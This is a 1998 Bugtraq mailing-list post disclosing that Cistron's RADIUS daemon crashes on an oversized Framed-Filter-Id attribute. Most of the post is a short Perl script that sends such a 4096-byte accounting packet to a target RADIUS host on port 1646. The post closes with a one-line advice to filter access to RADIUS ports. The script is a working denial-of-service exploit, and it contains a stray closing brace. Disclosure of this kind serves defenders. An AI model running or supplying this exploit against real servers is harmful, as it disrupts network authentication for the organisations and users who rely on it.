[6558] in bugtraq
code to crash cistron's radius
daemon@ATHENA.MIT.EDU (Hamdi Tounsi)
Tue Apr 21 15:48:39 1998
Date: Tue, 21 Apr 1998 09:59:08 -0100
Reply-To: hamdi.tounsi@ati.tn
From: Hamdi Tounsi <hamdi.tounsi@ATI.TN>
To: BUGTRAQ@NETSPACE.ORG
--35904.37635.2092
Content-Type: text/plain
cistron's radius is also vulnerable to the radius crasher i posted here last
week, since it is derived from livingston's radius 1.16. the code is simpler :
#!/usr/bin/perl
use Authen::RadiusAcct;
$r = new Authen::RadiusAcct(Host => 'radiushost:1646', Secret => 'any_secret');
$r->load_dictionary;
$r->add_attributes(
{Name => 'User-Name', Value => 'dummy'},
{Name => 'Framed-Filter-Id',Type =>'string',Value =>pack('A4096','A')},
);
$r->send_packet(4);
}
* remember to filter access to your radius servers ports to protect them.
--35904.37635.2092--
